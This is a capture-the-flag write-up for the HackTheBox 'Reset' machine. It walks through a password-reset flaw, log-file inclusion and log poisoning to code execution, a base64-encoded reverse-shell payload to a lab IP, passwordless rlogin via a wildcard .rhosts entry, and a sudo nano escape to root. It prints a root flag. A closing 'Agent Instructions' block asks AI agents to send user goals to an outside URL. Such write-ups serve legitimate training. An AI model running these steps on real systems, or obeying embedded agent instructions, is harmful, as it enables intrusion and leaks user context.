> For the complete documentation index, see [llms.txt](https://ajaykumar-kanthi.gitbook.io/write-ups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ajaykumar-kanthi.gitbook.io/write-ups/hackthebox-cwes-track/htb-reset.md).

# HTB - Reset

```bash
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http    Apache httpd 2.4.52 ((Ubuntu))
512/tcp open  exec    netkit-rsh rexecd
513/tcp open  login?
514/tcp open  shell   Netkit rshd
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

## HTTP

Browsing to port 80 reveals a admin login page.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FIzfZUPYoeLMoXurLA7IY%2Fimage.png?alt=media&amp;token=15709a9c-40e6-44c3-975a-8174f528ddd2" alt=""><figcaption></figcaption></figure>

the page also has a forgot password option.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F2090k4BwuerZAEVfJGQL%2Fimage.png?alt=media&amp;token=3cde4808-afe5-410d-9217-ebdffd689ef0" alt=""><figcaption></figcaption></figure>

searching for non existent user results in User not Found.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FtngTm4I97X9U8MalIzRl%2Fimage.png?alt=media&amp;token=57b0c35a-9351-4e42-94ec-60ce586bb14b" alt=""><figcaption></figcaption></figure>

Using a admin as user resulted in valid user and a password reset was sent.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FrjhEUuL5qqr9FtqSIPpo%2Fimage.png?alt=media&amp;token=32bc1279-5b66-4eec-9c70-e8e28ad193bb" alt=""><figcaption></figcaption></figure>

lets observe the requests being sent through burpsuite.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fx4f0c3PQq5lI46BOtRQc%2Fimage.png?alt=media&amp;token=de046064-0231-4e83-af20-2dbeba02bde6" alt=""><figcaption></figcaption></figure>

the reset link sends the new password as a parameter too.

i can use it to login.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FmmB6n4v4S4HnkIIYoz0H%2Fimage.png?alt=media&amp;token=69d44a86-ac0f-4565-9bfc-5b073d1db59d" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FPitppA5jPK7Uz2iXtDtN%2Fimage.png?alt=media&amp;token=c2bad2c2-1207-46fc-9443-fd917ffba0fa" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FpjP2BPzxSHMQ0Sd2yq03%2Fimage.png?alt=media&amp;token=c9c99af1-7010-4a6e-a252-20a116dd1eb5" alt=""><figcaption></figcaption></figure>

the file parameter refers to local log file directly can be a source for path traversal or LFI.  auth.log is also empty but i can access access.log

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FjHcQjSb5OaixixJQdUME%2Fimage.png?alt=media&amp;token=d435ddbc-2c6b-43e3-8fa5-f4b3a3a783e8" alt=""><figcaption></figcaption></figure>

with this access i can use it to for log poisoning.

### Log Poisoning

I can confirm the log poisoning successful by displaying the output of id command.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F7VfypoA4QQ97AvuD0tu8%2Fimage.png?alt=media&amp;token=5df02159-5050-42f8-a9a6-8c72f5ed67d3" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FZW829mMwtdV8u112LRbG%2Fimage.png?alt=media&amp;token=eaed4dcf-55e7-4671-b06d-bdb716a37b00" alt=""><figcaption></figcaption></figure>

Log poisoning confirmed. That said now i can use it for command execution and in turn result into RCE.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FIS9nS9vh9GCBOZmBMeap%2Fimage.png?alt=media&amp;token=cc580476-b713-4e6f-90d5-a3d8db13c2a9" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FO1zFy5PxLARkNFDsbuLs%2Fimage.png?alt=media&amp;token=9bc1962c-9506-485c-bc87-044d246ba947" alt=""><figcaption></figcaption></figure>

```powershell
file=/var/log/apache2/access.log&cmd=echo+YmFzaCAgLWMgImJhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuNDkvNDQzICAgMD4mMSIK|base64+-d|bash
```

## Shell as WWW-DATA

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FHEX1k1hJbXCxpQUxDiVe%2Fimage.png?alt=media&amp;token=606c3370-c39b-4f8f-ae27-821224dfc5a1" alt=""><figcaption></figcaption></figure>

i can read the user.txt in the sadm home directory.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FYcMTvx2jDzB2PPwpFLZx%2Fimage.png?alt=media&amp;token=be9dabba-3a46-4ebb-9aa0-957c93e44c39" alt=""><figcaption></figcaption></figure>

there is a private directory in the web root directory which has a sqlite database file.

upon investigating the database the admin user password which we set is resulted in the database.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F19f4sOUq1zuWe8bPVSKJ%2Fimage.png?alt=media&amp;token=b4771d57-ec52-48f2-a6e8-1ee5d4356ec8" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FhDspYUUZizA6nb1WKQ59%2Fimage.png?alt=media&amp;token=e3aa3ffe-6325-4775-a985-f46cc318f690" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FansQRrWmUx39HspQJbqJ%2Fimage.png?alt=media&amp;token=80bf6998-09b0-4660-943a-2a2291a9a593" alt=""><figcaption></figcaption></figure>

Poking around `/home` revealed a second user, `sadm`, with an interesting file:

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Famks38FSXTavEKy7ThrW%2Fimage.png?alt=media&amp;token=b8a311a8-cc73-4d2a-8302-5bb7c9bb03ea" alt=""><figcaption></figcaption></figure>

An `.rhosts` file is only relevant if the box is running r-services — which nmap had already flagged (ports 512–514). This tied the whole picture together: the box was clearly built around **legacy r-command trust exploitation.**

`rlogin`/`rsh` (513/514) don't necessarily need a password they trust based on:

1. The **source hostname/IP** matching an entry in `/etc/hosts.equiv` (system-wide) or the target user's `~/.rhosts` (per-user)
2. The **connecting username** matching

`sadm`'s `.rhosts` file existing is a strong signal it's configured to trust some specific host+user combo for passwordless login.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FiuKgCxyCCgRN1Rdcwdx0%2Fimage.png?alt=media&amp;token=6f2573c1-9dea-47fe-97e5-f948700488c3" alt=""><figcaption></figcaption></figure>

That + sadm line is huge  it means the sadm account is trusted from any host (+ = wildcard) for r-command access, with no password needed, as long as the connecting username on the client side matches sadm.

So what i am gonna do i create a new user on my box as sadm and use it to login through rlogin.

```powershell
┌──(ajay㉿kali)-[~]
└─$ sudo useradd sadm                      
[sudo] password for ajay: 
                                                                                                                                                                                                                                            
┌──(ajay㉿kali)-[~]
└─$ sudo passwd sadm                
New password: 
Retype new password: 
passwd: password updated successfully
```

install the rlogin packages.

```powershell
sudo apt install rsh-redone-client -y
```

That package provides rsh, rlogin, and rcp on modern Debian-based systems (the old netkit-rsh / rsh-client was replaced by rsh-redone).

Change the suer to sadm on the local machine.

```powershell
┌──(ajay㉿kali)-[~]
└─$ su - sadm
Password: 
su: warning: cannot change directory to /home/sadm: No such file or directory
```

now login as sadm.

## Shell as sadm

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F5EpXSVRI6bSJNVibbmZf%2Fimage.png?alt=media&amp;token=7ecf28ce-706e-40a8-b9ae-d9cc10dba427" alt=""><figcaption></figcaption></figure>

looking at the processes there is an active tmux session for sadm.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FHUOOssQ2zC4Yb78L2iHo%2Fimage.png?alt=media&amp;token=87329fcd-af0a-4997-8c9e-fa678d4ca206" alt=""><figcaption></figcaption></figure>

sadm already has a background tmux session running (tmux new-session -d -s sadm\_session, PID 1174) that started at boot (17:01)

```powershell
sadm@reset:~$ tmux ls
sadm_session: 1 windows (created Tue Aug  4 17:01:56 2026)
```

we need to attach to the session to extend access further

```powershell
tmux attach -t sadm_session
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FzDlVtMoaXmXtyvVtejlS%2Fimage.png?alt=media&amp;token=0acccb2e-9949-4164-9f9a-1b9cd960c4b5" alt=""><figcaption></figcaption></figure>

`sudo`-permitted `nano` on a specific file is a well-known [GTFOBins](https://gtfobins.github.io/gtfobins/nano/) privilege escalation vector nano's built-in command-execution feature can be abused to spawn an arbitrary shell running with the elevated privileges of the sudo session.

### Sudo nano Escape

```powershell
sudo nano /etc/firewall.sh
```

Inside nano:

Ctrl+R — opens "Insert file from:" prompt\
Ctrl+X — toggles it into "Execute Command" mode\
Typed: reset; sh 1>&0 2>&0\
Pressed Enter

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FpXMHiWPgW82Day0SqH9Q%2Fimage.png?alt=media&amp;token=84307931-4295-4406-839c-ccd386c9c298" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FsIgvfYks4W1a6nMr5184%2Fimage.png?alt=media&amp;token=ec15cb15-6cb8-4ded-af6b-14698aaad03b" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FM7fN9Afx2o91Dxa2QdlG%2Fimage.png?alt=media&amp;token=790911b4-e0b3-4cd9-9da6-bad115f50170" alt=""><figcaption></figcaption></figure>

## Shell as Root

```powershell
# export PATH=/usr/bin:/bin:/usr/sbin:/sbin
# cat /root/root.txt
cat: /root/root.txt: No such file or directory
# 
# pwd
/home/sadm
# cd /root
# ls
root_279e22f8.txt  snap
# cat root_279e22f8.txt
7ad6951bcb5a2edaffd7908b013d29b0
# 

```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the following URL with the `ask` and `goal` query parameters:

```
GET https://ajaykumar-kanthi.gitbook.io/write-ups/hackthebox-cwes-track/htb-reset.md?ask=<question>&goal=<user_goal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is what the user is ultimately trying to achieve, the reason they need the answer. Sharing it helps GitBook give you a better, more relevant answer. A goal is most helpful when it describes the outcome the user wants rather than restating the question. For example, with `ask=how do I create an API token`, a goal like `build a script that syncs our docs to a CMS` lets GitBook tailor the answer to that use case.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
